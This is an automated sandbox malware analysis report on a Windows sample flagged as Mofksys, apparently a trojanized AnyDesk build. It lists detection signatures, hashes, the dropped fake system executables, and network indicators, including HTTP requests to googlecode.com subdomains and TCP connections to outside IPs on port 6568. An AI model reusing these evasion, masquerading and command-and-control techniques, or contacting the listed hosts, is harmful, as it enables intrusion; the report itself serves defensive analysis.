Windows Analysis Report
sJ9Q8UWMAX.com_7fdb00c80f0250575a05601c08627d50

Overview

General Information

Sample Name: sJ9Q8UWMAX.com_7fdb00c80f0250575a05601c08627d50 (renamed file extension from com_7fdb00c80f0250575a05601c08627d50 to exe)
Analysis ID: 666578
MD5: 7fdb00c80f0250575a05601c08627d50
SHA1: 709a67ee148978a05bb3c3b530d68004c1eb5196
SHA256: 5d47d5ad88c5d99cac3a860e682bb9542046e05ee33b3a4fd896db5464e7f0a6
Tags: exe

Detection

CryptOne, Mofksys
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mofksys
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
PE file has a writeable .text section
Queries memory information (via WMI often done to detect virtual machines)
Machine Learning detection for sample
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Modifies existing windows services
Sample file is different than original file name gathered from version info
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Contains functionality to detect virtual machines (SGDT)

Classification

  • System is w10x64
  • sJ9Q8UWMAX.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\sJ9Q8UWMAX.exe" MD5: 7FDB00C80F0250575A05601C08627D50)
    • sj9q8uwmax.exe (PID: 6912 cmdline: c:\users\user\desktop\sj9q8uwmax.exe MD5: 871EB4B8AEFAEA1113DD3F08B7CB535C)
      • sj9q8uwmax.exe (PID: 7024 cmdline: "c:\users\user\desktop\sj9q8uwmax.exe " --local-service MD5: 871EB4B8AEFAEA1113DD3F08B7CB535C)
      • sj9q8uwmax.exe (PID: 2884 cmdline: "c:\users\user\desktop\sj9q8uwmax.exe " --local-control MD5: 871EB4B8AEFAEA1113DD3F08B7CB535C)
    • icsys.icn.exe (PID: 6972 cmdline: C:\Windows\Resources\Themes\icsys.icn.exe MD5: 0A9BDF90EF50DEF16C6D4C363D0F0B9C)
      • explorer.exe (PID: 7056 cmdline: c:\windows\resources\themes\explorer.exe MD5: DD8285E811872E2562A43A04A7B27672)
        • spoolsv.exe (PID: 2532 cmdline: c:\windows\resources\spoolsv.exe SE MD5: A97B2BA7591F981B8BBB1CE5E78C8D3A)
          • svchost.exe (PID: 2960 cmdline: c:\windows\resources\svchost.exe MD5: E2A51AD55E5850D878E994E774D44ED1)
            • spoolsv.exe (PID: 5092 cmdline: c:\windows\resources\spoolsv.exe PR MD5: A97B2BA7591F981B8BBB1CE5E78C8D3A)
  • svchost.exe (PID: 6104 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6536 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 2928 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: DD8285E811872E2562A43A04A7B27672)
  • svchost.exe (PID: 6468 cmdline: "C:\windows\resources\svchost.exe" RO MD5: E2A51AD55E5850D878E994E774D44ED1)
  • svchost.exe (PID: 4672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sJ9Q8UWMAX.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\Resources\Themes\explorer.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\Windows\Resources\Themes\icsys.icn.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\Windows\Resources\spoolsv.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
C:\Windows\Resources\svchost.exe | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000000.464382819.0000000000401000.00000080.00000001.01000000.0000000A.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
0000000B.00000002.507320494.0000000000402000.00000080.00000001.01000000.0000000B.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
00000008.00000002.515627841.0000000000402000.00000080.00000001.01000000.0000000B.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
00000010.00000002.563844103.0000000000402000.00000080.00000001.01000000.0000000C.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
00000008.00000000.485612261.0000000000401000.00000080.00000001.01000000.0000000B.sdmp | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |

Source | Rule | Description | Author | Strings
2.2.icsys.icn.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
11.2.spoolsv.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
11.0.spoolsv.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
8.2.spoolsv.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |
9.2.svchost.exe.400000.0.unpack | JoeSecurity_Mofksys | Yara detected Mofksys | Joe Security |

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: sJ9Q8UWMAX.exe, Virustotal: Detection: 86%
Source: sJ9Q8UWMAX.exe, Metadefender: Detection: 85%
Source: sJ9Q8UWMAX.exe, ReversingLabs: Detection: 100%
Source: sJ9Q8UWMAX.exe, Avira: detected
Source: C:\Windows\Resources\Themes\icsys.icn.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\Resources\spoolsv.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\Resources\svchost.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\Resources\Themes\explorer.exe, Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: sJ9Q8UWMAX.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\icsys.icn.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\spoolsv.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\svchost.exe, Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\explorer.exe, Joe Sandbox ML: detected
Source: sJ9Q8UWMAX.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 185.229.191.39:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49856 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 49.12.130.237:443 -> 192.168.2.5:49889 version: TLS 1.2
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-64\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe, 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: sj9q8uwmax.exe, 00000001.00000002.745852702.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-32\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe, 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-64\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe, 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-32\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe, 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb@ source: sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: SAS.pdbR source: sj9q8uwmax.exe, 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: SAS.pdb source: sj9q8uwmax.exe, 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe, 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: Yara match, File source: sJ9Q8UWMAX.exe, type: SAMPLE
Source: Yara match, File source: 2.2.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.sJ9Q8UWMAX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 13.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 13.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.0.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 16.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.sJ9Q8UWMAX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: Process Memory Space: sJ9Q8UWMAX.exe PID: 6872, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: icsys.icn.exe PID: 6972, type: MEMORYSTR
Source: Yara match, File source: C:\Windows\Resources\Themes\explorer.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Resources\Themes\icsys.icn.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Resources\spoolsv.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Resources\svchost.exe, type: DROPPED

Networking

Source: C:\Windows\Resources\Themes\explorer.exe, Domain query: codecmd02.googlecode.com
Source: C:\Windows\Resources\Themes\explorer.exe, Network Connect: 142.250.102.82 80
Source: C:\Windows\Resources\Themes\explorer.exe, Domain query: codecmd01.googlecode.com
Source: C:\Windows\Resources\Themes\explorer.exe, Domain query: codecmd03.googlecode.com
Source: Joe Sandbox View, JA3 fingerprint: c91bde19008eefabce276152ccd51457
Source: Joe Sandbox View, IP Address: 92.223.88.41
Source: global traffic, HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd01.googlecode.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd02.googlecode.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd03.googlecode.com
    Connection: Keep-Alive
Source: global traffic, TCP traffic: 192.168.2.5:49771 -> 92.223.88.41:6568
Source: global traffic, TCP traffic: 192.168.2.5:49813 -> 49.12.130.236:6568
Source: unknown, Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49889
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:57:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 
28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:24 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:26 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:29 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:33 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:40 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:42 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:43 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:45 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:46 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:48 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:49 GMT
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Sat, 16 Jul 2022 21:57:50 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:57:53 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:57:55 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:57:58 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:00 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:03 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:05 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:07 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:08 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:10 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:12 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:13 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:15 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:16 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:17 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:18 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:20 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:21 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:27 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:31 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:35 GMT
                                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Sat, 16 Jul 2022 21:58:39 GMT
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: ad.share.fbook.href=https://www.facebook.com/sharer/sharer.php?u=https%3A//anydesk.com/ equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: ad.share.linkedin.href=https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Remote%20Desktop&summary=AnyDesk%20is%20a%20small%20and%20quick%20solution%20for%20screen%20sharing%20and%20remote%20collaboration.%20Get%20it%20here%3A%20https%3A//anydesk.com/&source= equals www.linkedin.com (Linkedin)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/sharer/sharer.php?u=https%3A//anydesk.com/ equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/sharer/sharer.php?u=https%3A//anydesk.com/b equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comd5 equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.759165577.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.commm equals www.facebook.com (Facebook)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.linkedin.comfu equals www.linkedin.com (Linkedin)
                                Source: sj9q8uwmax.exe , 00000001.00000003.458754286.000000000354F000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.759165577.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.459032529.0000000003583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.linkedin.comyeE equals www.linkedin.com (Linkedin)
